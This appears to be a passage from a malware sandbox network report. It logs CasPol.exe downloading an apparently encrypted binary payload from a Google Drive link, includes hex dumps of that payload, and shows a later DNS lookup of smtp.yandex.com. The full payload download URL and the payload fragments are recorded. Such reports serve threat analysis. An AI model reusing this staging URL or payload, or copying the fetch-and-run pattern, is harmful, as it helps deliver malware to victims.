                                                          Dec 14, 2021 14:10:57.617944956 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.617960930 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.618051052 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.618132114 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.618148088 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.618268967 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.618330002 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.618839025 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.619004965 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.619019985 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.619266987 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.619574070 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.619733095 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.619745970 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.620095015 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.620348930 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.620562077 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.620577097 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.620836020 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.621092081 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.621259928 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.621274948 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.621453047 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.621773005 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.621918917 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.621929884 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.622128010 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.622534990 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.622694016 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.622704983 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.622844934 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.623286963 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.623441935 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.623452902 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.623657942 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.624110937 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.624280930 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.624293089 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.624452114 CET49798443192.168.11.20172.217.18.97

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 14, 2021 14:10:56.248711109 CET5822253192.168.11.201.1.1.1
                                                          Dec 14, 2021 14:10:56.257919073 CET53582221.1.1.1192.168.11.20
                                                          Dec 14, 2021 14:10:56.831254005 CET5564953192.168.11.201.1.1.1
                                                          Dec 14, 2021 14:10:56.870028973 CET53556491.1.1.1192.168.11.20
                                                          Dec 14, 2021 14:12:32.789335966 CET5603653192.168.11.201.1.1.1
                                                          Dec 14, 2021 14:12:32.802006006 CET53560361.1.1.1192.168.11.20

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Dec 14, 2021 14:10:56.248711109 CET192.168.11.201.1.1.10xb7aaStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                          Dec 14, 2021 14:10:56.831254005 CET192.168.11.201.1.1.10x6041Standard query (0)doc-08-0o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                          Dec 14, 2021 14:12:32.789335966 CET192.168.11.201.1.1.10xd1cbStandard query (0)smtp.yandex.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Dec 14, 2021 14:10:56.257919073 CET1.1.1.1192.168.11.200xb7aaNo error (0)drive.google.com172.217.16.142A (IP address)IN (0x0001)
                                                          Dec 14, 2021 14:10:56.870028973 CET1.1.1.1192.168.11.200x6041No error (0)doc-08-0o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                          Dec 14, 2021 14:10:56.870028973 CET1.1.1.1192.168.11.200x6041No error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)
                                                          Dec 14, 2021 14:12:32.802006006 CET1.1.1.1192.168.11.200xd1cbNo error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                          Dec 14, 2021 14:12:32.802006006 CET1.1.1.1192.168.11.200xd1cbNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • drive.google.com
                                                          • doc-08-0o-docs.googleusercontent.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.11.2049797172.217.16.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-12-14 13:10:56 UTC0OUTGET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          2021-12-14 13:10:56 UTC0INHTTP/1.1 302 Moved Temporarily
                                                          Content-Type: text/html; charset=UTF-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Tue, 14 Dec 2021 13:10:56 GMT
                                                          Location: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                          Content-Security-Policy: script-src 'nonce-1G8Gp8B2UEOkI0HifZNEog' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: GSE
                                                          Set-Cookie: NID=511=J_3yJwUAAtWUYnpCcw6DYFW_EMywHfhC8czerksMouqgyq0rSKE35bjzaD-raV72tk-l3-pTZoEq9_T6BXdQ7iFU6Fad3LhU0S_Fmm6imh0on-jt0MzfHKydNVzme3_GqTSqtmb47AVj27oUngbwanZt282E7rmT0-hM4sya-aE; expires=Wed, 15-Jun-2022 13:10:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Accept-Ranges: none
                                                          Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2021-12-14 13:10:56 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 30 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 38 67 37 62
                                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b
                                                          2021-12-14 13:10:56 UTC2INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.11.2049798172.217.18.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-12-14 13:10:56 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Cache-Control: no-cache
                                                          Host: doc-08-0o-docs.googleusercontent.com
                                                          Connection: Keep-Alive
                                                          2021-12-14 13:10:57 UTC2INHTTP/1.1 200 OK
                                                          X-GUploader-UploadID: ADPycdvGLgvmhcbmmFr5IR8_SRhPMjTe-w7Cpc9Ebvd-Zve3W60cITOVKibsQQTpuDkTxD_pUG_W5feFniLI1NJfcnU
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: false
                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                          Access-Control-Allow-Methods: GET,OPTIONS
                                                          Content-Type: application/octet-stream
                                                          Content-Disposition: attachment;filename="bombom bin2lladee SEPT_gySrkZgjTH62.bin";filename*=UTF-8''bombom%20bin2lladee%20SEPT_gySrkZgjTH62.bin
                                                          Content-Length: 221248
                                                          Date: Tue, 14 Dec 2021 13:10:57 GMT
                                                          Expires: Tue, 14 Dec 2021 13:10:57 GMT
                                                          Cache-Control: private, max-age=0
                                                          X-Goog-Hash: crc32c=yX/SFA==
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Connection: close
                                                          2021-12-14 13:10:57 UTC6INData Raw: 29 fd 02 31 4c 9b cb 0b 7b fe 37 82 1f ee 49 99 d6 7c 91 28 82 be d5 3a b3 97 3f 55 b1 b5 c3 07 75 28 21 89 40 58 ab 64 64 f6 cc 62 47 20 d2 53 73 31 cb a2 9b 51 bc a7 16 fc bc f8 50 a3 6d 18 1c 02 09 ef f0 24 cf 92 5d 66 22 fa 94 64 4a 14 ca 10 82 53 2e 70 85 cb f1 de 7b 3f c2 34 3a 67 c4 b1 1e ff 8a 63 c0 48 1f b5 4f 81 cf 39 4a 16 d9 d5 49 da 70 95 7c e3 e0 3a 77 7d 0f 1d 82 be 51 9f 65 52 de db 29 83 c9 22 35 94 18 c0 94 67 1d 40 c1 57 0e 5b f3 a7 1e 56 56 8d 6e 6a 01 24 e0 c8 e6 ef 59 8e 76 d4 1e ea d6 0d a8 d3 12 ed ff 8d 1c 1a 10 c8 a2 88 e2 79 5c f5 31 d4 44 e4 d0 f1 ae 2e e6 0a d2 ca c9 77 a1 ec 22 4a f1 7e e7 a0 45 6c c2 2e 6c 43 25 5e 28 9c 53 50 85 d5 b6 e6 47 75 e9 d5 e9 28 fb 9d f3 c0 b6 49 b9 b0 c1 a8 90 7a 5e 25 36 cb 5c 09 8a bf 25 6d 30
                                                          Data Ascii: )1L{7I|(:?Uu(!@XddbG Ss1QPm$]f"dJS.p{?4:gcHO9JIp|:w}QeR)"5g@W[VVnj$Yvy\1D.w"J~El.lC%^(SPGu(Iz^%6\%m0
                                                          2021-12-14 13:10:57 UTC10INData Raw: 04 56 2c 06 5a d8 bc cb cb 0c 10 ae 39 30 40 3f a1 5d 87 e3 73 5c fb e2 eb 0a f9 01 41 e7 e2 5d 71 9e f1 0a 69 53 77 ab 9d 7e ea 07 51 c5 7a 50 d6 ec 11 5c e3 c3 26 82 d3 4f 34 8c 21 98 57 53 4c af 5d 18 bc 8e 08 e0 a8 bc 7e 5f ac dd 5b 04 52 e3 63 a3 8d dd 8d 2c f7 11 17 f9 9c c6 39 53 a4 16 c9 dc b0 f6 2e d3 36 98 3b 0d f9 fc c0 2b fe 97 8f 9c f6 57 c1 02 69 bf f0 06 2c b1 eb 0b 81 9a 9e 06 2d ab ba e0 b4 d1 47 c1 9d 8f 22 01 87 b2 ab ab 96 63 d1 37 cf eb 7e b9 be 3f dc e3 0e a7 4e ed 82 bc fe 30 b1 cf 92 6d 49 9c 31 3d 67 de 01 a6 92 45 e8 a6 f1 97 fe 47 37 7d 2f 4e e6 91 0a eb 1c 45 60 3d ee 2b 27 bc 66 82 d1 3a f6 41 08 b4 b3 db 02 1c 35 6b 7f 28 4c cd 85 fa 8d 06 18 ff 38 d9 b9 2c e2 4b e8 8a a6 5c df 88 88 12 8e ab a2 53 50 81 ce 63 cc 12 e4 2a a1
                                                          Data Ascii: V,Z90@?]s\A]qiSw~QzP\&O4!WSL]~_[Rc,9S.6;+Wi,-G"c7~?N0mI1=gEG7}/NE`=+'f:A5k(L8,K\SPc*
                                                          2021-12-14 13:10:57 UTC13INData Raw: 51 dc 8f 97 c9 c1 83 51 7e 07 47 56 e6 24 11 bc 3c 38 50 48 6f 38 9a 0f e8 5a e7 25 51 40 38 d7 3f c6 6e 50 6a 7f 6e 3f c7 0c 1c aa de 86 63 f3 40 e1 80 83 65 9a 41 bb a3 81 2f ad 42 fd 3d 6f f2 47 5f 3e fa e5 5f 0a 72 e6 1d d0 d5 fc 90 7f 0d 24 6e 4a d1 78 e3 24 8d 15 e9 0c 94 c1 67 9d c4 73 bc 9b be f2 29 b6 9a 8a 02 74 17 10 00 7b 86 d5 3e ef 8c 4d 14 83 9a 5c 54 a2 93 c4 f9 86 c0 f2 58 fc 96 59 24 28 65 fb c8 82 4c 74 3d b0 0e d8 d2 b5 a7 2f e5 e5 52 d0 84 9a 54 ca 1b b7 4a f7 0f 6e 86 82 e6 e2 60 79 da 91 70 87 8a af d2 3a 7d 90 ba a9 e2 5f b0 c8 0a 8e b4 cd 06 17 c3 87 ec ac 3e 4d 0e 8f 20 33 56 2c d0 6a ba 99 82 d8 77 a6 46 41 87 7e 23 79 b3 0b 53 33 4c 67 c4 06 9b 5e 22 d8 59 9d 37 d2 75 da 6a 94 db bc 9f b7 b7 ce 53 20 c6 fe 50 01 ad 4a 81 9d d5
                                                          Data Ascii: QQ~GV$<8PHo8Z%Q@8?nPjn?c@eA/B=oG_>_r$nJx$gs)t{>M\TXY$(eLt=/RTJn`yp:}_>M 3V,jwFA~#yS3Lg^"Y7ujS PJ
                                                          2021-12-14 13:10:57 UTC17INData Raw: 16 81 e6 26 86 51 1b 9b 86 09 f5 9d 97 58 99 e5 2d 2b ea ba 6e 66 22 f0 78 b2 62 2c 72 10 88 8d 2e 61 8d e3 50 de 7b 39 ad f2 3a 67 ce 6f 11 da a2 54 c0 48 15 a6 65 a9 f7 39 4a 1c 07 d5 58 d2 58 55 7c e3 e6 55 b1 7d 8f 17 5c b1 7a a8 e8 5c de 65 33 65 c0 a2 34 d8 df 3f c0 1e 7c 1b 5d 27 7c 32 fb 13 7f 3b 7c 30 00 21 47 7c 94 e8 8e 99 55 d4 3b ba 3e 89 66 2d fd 94 69 d9 93 e2 7e 10 f8 c5 af 88 18 75 74 c2 31 d4 4e cc b8 b4 ae 24 74 0b c0 c2 94 c8 e0 8d 24 25 37 7e e7 aa 9b 63 07 06 59 42 2e 55 30 b1 7b 3e 86 d5 bc 30 47 64 e1 fd fc 29 15 ee 9f 06 b6 69 b3 6e cd 80 a7 7a 5e 2f 5e f3 5c 29 80 61 25 7e 38 f4 ae 84 9d b0 ca 04 38 82 e7 47 10 8f 0e 56 b4 4b 9b 65 81 2b c6 e3 1e f4 be c6 85 f4 ce 8e bb f0 6c 7d ee 73 cf 3b 03 14 c8 08 b1 cd 94 73 c3 04 a6 5e cf
                                                          Data Ascii: &QX-+nf"xb,r.aP{9:goTHe9JXXU|U}\z\e3e4?|]'|2;|0!G|U;>f-i~ut1N$t$%7~cYB.U0{>0Gd)inz^/^\)a%~88GVKe+l}s;s^
                                                          2021-12-14 13:10:57 UTC18INData Raw: 1c ff d5 e1 ca 60 b9 33 e1 2d 5a 25 93 fd b2 39 76 e8 1e 02 11 53 94 e8 80 a2 5e fc 03 b0 51 4e b8 2d e6 ba 50 ca ba 2c 7a 7f 38 cd d1 9a c6 79 58 dd 16 d4 44 ee ef 79 ae 2e a0 2d c0 cd c2 6c e0 8d 26 25 3c 7e e7 aa 63 b2 2d 0b 46 75 2e 5f 29 8f 6f 2e be d5 b6 e4 99 75 fb 94 c1 f9 15 e8 fa fa df 97 46 4f 1f a6 82 3b a0 33 79 cb 5c 32 e5 e8 25 6f 3a 00 4a 83 f2 64 a5 c2 32 ed 24 99 1f a0 3f 5f d9 4a 91 76 d1 0d fe e3 1a e9 53 fb bc 3c e4 8a bc d8 40 12 28 75 e7 19 dd 1b eb 31 81 a2 46 79 d0 21 a6 42 cf a6 e5 5c db 2c 64 2c 06 5c 53 cc f1 d8 16 10 8b 10 1c 70 3a ab 59 bb f7 60 4e d3 da fa 08 db 95 64 e6 e8 29 3c 90 f1 0b 67 4d 1f 7d 9d 7e e0 73 97 d0 7a 5a d1 e8 3e 01 a3 d5 04 4b f1 6f 7c 2e 30 b7 0d 2d 5b a5 5b 0b fb 85 0a e0 a4 92 36 6f c3 94 34 7c 58 e5
                                                          Data Ascii: `3-Z%9vS^QN-P,z8yXDy.-l&%<~c-Fu._)o.uFO;3y\2%o:Jd2$?_JvS<@(u1Fy!B\,d,\Sp:Y`Nd)<gM}~szZ>Ko|.0-[[6o4|X
                                                          2021-12-14 13:10:57 UTC19INData Raw: c3 c4 fc 3b ab ad 16 0c 49 a4 d2 6b 09 89 34 29 cd 4d b3 99 3b 39 18 bb ff 34 3f 0d 54 0c 1f 45 33 b5 b5 a5 bc 32 75 13 c4 31 2d 5c a6 02 b6 1a 54 68 08 f8 ee 0c 76 12 cd f3 e9 58 7a 51 dc 8e a5 52 c1 82 5b 61 0d cb 0d ef 24 10 9a a7 38 50 50 4e 4f 98 03 ee 72 7c 3f 51 4a 11 af 3d c6 68 66 f8 7f 6e 3b ef 29 1c 86 dd ae f8 fc 40 eb a8 dc 67 9a 46 93 38 81 2f 9c 63 db 3d 61 f8 6f c4 77 f3 ef 40 0f fe b9 1d ca d4 d4 0a 7f 0d 2e 46 6b da 78 e5 02 16 15 e9 60 b5 b9 65 92 c2 5b 27 81 be f8 00 b2 9a 8a 04 6e 84 10 00 7f e9 b4 3e 6c 8f 65 8f 8c 9a 56 4b b2 1f 9b f8 86 c1 da c3 6e 9f 53 0c 54 67 fb ce 0a de 74 3d b5 19 f0 f2 af a7 29 cc 7e 52 d0 8e 2a 57 46 44 b9 4a f6 27 48 8f 82 ec c5 13 7b da 8d 58 1c 8b af d8 22 55 7c b3 a9 e4 79 2b c8 0a 5e a2 c7 8a 47 c3 87
                                                          Data Ascii: ;Ik4)M;94?TE32u1-\ThvXzQR[a$8PPNOr|?QJ=hfn;)@gF8/c=aow@.Fkx`e['n>leVKnSTgt=)~R*WFDJ'H{X"U|y+^G
                                                          2021-12-14 13:10:57 UTC21INData Raw: 18 4f b5 43 9b cf 39 4b 05 e9 d6 49 50 70 95 7c eb e0 3a 66 6b 84 25 fe be 5f 80 df 5b c3 91 21 62 e3 98 22 db ba 0e c0 0f 7e 19 ff 2c 7c 33 8d 2b 7e 17 70 ed 19 2a 57 51 9f e8 83 90 87 fd 2f b1 3c ec 71 2d ec 96 57 fe 80 f9 73 7f 39 d2 51 83 ea 7b 44 fe 31 d3 58 1a 81 98 a3 2c c5 c2 d1 ca b6 76 d0 30 20 60 ec 75 e7 a7 5e 92 23 02 66 6a 00 5d 23 9a 79 1a 8d d5 b1 f6 b9 74 c5 d3 ea 3e 27 f1 e9 cb b6 6e af 4e c0 84 92 6d 55 25 71 d5 a2 28 a6 bd 0e 6a 08 a3 a4 7b 62 b0 8f c2 38 91 dd 9b 1f 36 26 61 b4 6c 91 76 be 15 ed e7 26 7d 60 c6 94 fc f7 8e a0 0e 6b 3e 20 4b b0 31 dd 1b f6 33 82 cd 85 7d c9 d5 8f 4a ca b0 e3 52 de 00 56 3d 02 41 8b 10 e7 de 1f 18 34 33 37 63 3e a1 5b 82 fb 8d 48 d7 eb d2 3b d1 48 4b ea f1 3a 46 9e e0 0f 7f ab 5e cd 8c 79 8f 05 1a c5 70
                                                          Data Ascii: OC9KIPp|:fk%_[!b"~,|3+~p*WQ/<q-Ws9Q{D1X,v0 `u^#fj]#yt>'nNmU%q(j{b86&alv&}`k> K13}JRV=A437c>[H;HK:F^yp
                                                          2021-12-14 13:10:57 UTC22INData Raw: 09 32 bd 6a 40 a0 c9 8c e1 e4 d0 42 ff 32 d9 b1 25 8d 1f f7 85 52 4c f6 03 b0 08 88 08 ae 45 4d 84 d0 4c 62 32 fd 17 ab aa 3e 77 f7 ac d8 eb 0e 89 34 2d c8 5f bf 98 33 26 12 45 33 10 35 11 d7 19 1f 45 e9 b6 aa ae bc 32 7d 09 20 30 01 4e a0 2a 52 18 b3 66 20 1d e2 0c 70 7d 40 fb e9 52 7f 4a d0 8e b7 4d cc 7d 5a 4d 06 cc 11 ce cd 12 94 a1 9a 4f 4c 4b 4f 90 12 10 73 50 31 57 62 3e ad 3d c0 7e 50 df 7f 6e 3f f9 12 71 aa d4 ae e6 ff 40 e3 b1 38 66 b6 54 95 10 63 2d a7 6c f3 de 6d f8 69 ab 46 fa ef 4a 0a e4 b5 1d d8 cb df f5 7e 21 25 41 25 ad 70 e5 0c 12 b7 f6 0a b0 b9 6d 82 d2 a5 26 b7 b5 ff 1a cc 83 8a 04 1f 2f 0f 11 7d e9 bc 21 e3 78 64 a3 88 9d 41 35 b1 1f 9b fd 24 de d7 cf fc 9e 45 f2 5b 4b f9 d9 a6 d7 7c 22 a8 e7 f1 de b7 8c 2c f5 0e ac 2f 71 af 45 76 40
                                                          Data Ascii: 2j@B2%RLEMLb2>w4-_3&E35E2} 0N*Rf p}@RJM}ZMOLKOsP1Wb>=~Pn?q@8fTc-lmiFJ~!%A%pm&/}!xdA5$E[K|",/qEv@
                                                          2021-12-14 13:10:57 UTC23INData Raw: cc 3f c2 92 50 71 dc fb 47 99 52 19 72 19 9b ad 2f 5c 81 e0 9e c4 76 3f cb 2c c4 66 e8 bf 08 81 af 63 c0 4c 91 02 58 5b c3 32 53 1b d9 dc 5f 24 71 b9 7e f4 ed 3a 7e 61 71 1c ae bc 74 82 f4 cb d9 78 f6 45 ef 92 05 79 c3 cb c0 0f 67 03 e2 27 da 34 94 d5 51 3b 76 ff 19 17 6b 73 1b e8 84 8a 79 ed 07 a3 c0 82 94 22 fa e2 64 cd 92 e6 f6 c8 29 1f a2 8e dc 6a 58 f5 20 d0 58 1a 81 98 ab 39 80 16 c2 ce bc 64 e4 97 dc 4b dd 7b cc ca 5e 7f 26 2e 7f 46 39 a1 22 b0 50 1e 95 d1 b6 ff 43 6d 17 d4 c5 3b 6b ca f0 c0 b2 41 46 b0 c1 a2 ff 17 5e 25 7c c1 45 3a 8e bf 34 6b 2b 22 5a a8 86 b0 ca c5 39 82 e7 e7 3a aa 26 65 bc d1 87 5e 81 03 fe e9 08 00 61 ea 89 e0 f5 8e ba e1 6e 04 d6 72 e3 32 ca 08 e9 20 97 c9 89 87 d1 07 8c 4d ca 9e 83 b7 32 fb 5e 3b d0 56 7d 18 fa 1a 00 3a ae
                                                          Data Ascii: ?PqGRr/\v?,fcLX[2S_$q~:~aqtxEyg'4Q;vksy"d)jX X9dK{^&.F9"PCm;kAF^%|E:4k+"Z9:&e^anr2 M2^;V}:
